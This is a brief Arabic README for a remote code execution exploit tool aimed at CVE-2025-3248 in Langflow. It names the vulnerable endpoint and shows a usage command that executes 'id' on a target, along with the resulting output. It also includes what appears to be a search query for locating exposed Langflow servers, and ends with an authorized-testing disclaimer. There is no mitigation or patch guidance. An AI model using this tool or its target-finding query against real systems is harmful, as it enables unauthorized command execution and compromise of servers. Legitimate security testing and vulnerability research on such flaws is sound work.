
CVE-2025-3248 استغلال RCE في Langflow
أداة استغلال لتنفيذ الأوامر عن بُعد (RCE) لتطبيقات Langflow المعرضة للثغرة CVE-2025-3248.
النقطة المتأثرة:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() في مسار كود يتحكم به المستخدمapp="Langflow"
هذه الأداة مخصصة لأغراض الاختبارات الأمنية التعليمية والمرخصة فقط. الاستخدام غير المصرح به محظور.